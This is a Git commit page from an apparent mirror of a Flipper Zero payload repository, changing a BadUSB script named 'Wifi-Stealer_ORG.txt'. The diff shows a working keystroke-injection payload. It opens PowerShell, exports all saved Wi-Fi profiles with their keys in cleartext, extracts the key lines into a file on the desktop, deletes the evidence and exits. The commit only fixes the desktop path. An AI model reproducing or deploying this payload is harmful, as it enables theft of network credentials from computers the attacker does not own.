mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-22 22:40:14 +00:00
Update Wifi-Stealer_ORG.txt
On my PC it does open in powershell location. I use power toys overlay for Run. This will redirect to the desktop from anywhere
This commit is contained in:
parent
de40b7fbff
commit
6c977513e6
@ -9,5 +9,5 @@ DELAY 500
|
|||||||
STRING powershell
|
STRING powershell
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING cd Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
|
STRING cd C:\Users\$env:UserName\Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
|
||||||
ENTER
|
ENTER
|
||||||
|
Loading…
Reference in New Issue
Block a user